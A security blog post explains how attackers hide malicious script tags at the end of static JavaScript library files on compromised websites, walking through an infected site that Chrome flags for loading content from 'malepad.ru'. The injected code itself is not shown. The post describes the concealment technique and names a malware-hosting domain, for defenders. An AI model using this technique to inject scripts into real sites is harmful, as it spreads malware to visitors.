Malicious scripts hidden inside JavaScript files – a new trick used by attackers

We have written many blogs on malicious iframes or script injection in dynamic webpages. The malicious iframes/script tags were typically being injected at the bottom of webpages or after html tags such as , etc. Often, they are very easy to find once you know that site is infected. You can easily able to see the injected malicious code inside the webpages just by opening the source of the page and inspecting the typical injection locations. Recently however, we are seeing another trick used by attackers whereby malicious iframes/script tags are being injected into static JavaScript files rather than on page itself. These are static files in the sense they are JavaScript libraries used for various purposes. This trick is used by the attacker so that it will be difficult to identify the injected iframe simply by inspecting the only source of the page. It also allows multiple pages to be infected, while only injecting content into a single location. Let’s walk through a live example of an infected website. Here is a screenshot of the website:

Interestingly, at present, Firefox does not provide any warning about the threat while Google Chrome does, despite the fact that both leverage Google SafeBrowsing block lists. Here is the block message from Chrome,

Chrome blocks this website with message saying “this site contains elements from the site ‘malepad.ru’ which appears to host malware”. I initially searched for malicious iframe/script tags inside the page source but could not identify it. The source of page looked clean at first glance. I then saw some JavaScript files being used inside the webpage however, they too appeared legitimate. Here is the source of the main page,

I then inspected the source code of the JavaScript files and found that they had clearly been altered. Let’s look at “blockcurrencies.js” as an example:

The malicious script code is being injected at the bottom of the JavaScript file. If you look at the above Chrome block image, you will find that this is the site present in the Chrome message. Every JavaScript file present inside the main webpage was injected with malicious script tags like the one shown above. Interestingly, we have also found the following malicious code present in JavaScript files on alternate sites:It is interesting to study the various tricks and techniques attackers use to hide their malicious code. We have seen an increase in attacks where malicious content is being injected into static JavaScript pages.

This is a good lesson, to not simply inspect the source code of the main page when looking for malicious content.

Have you checked your web files?

Umesh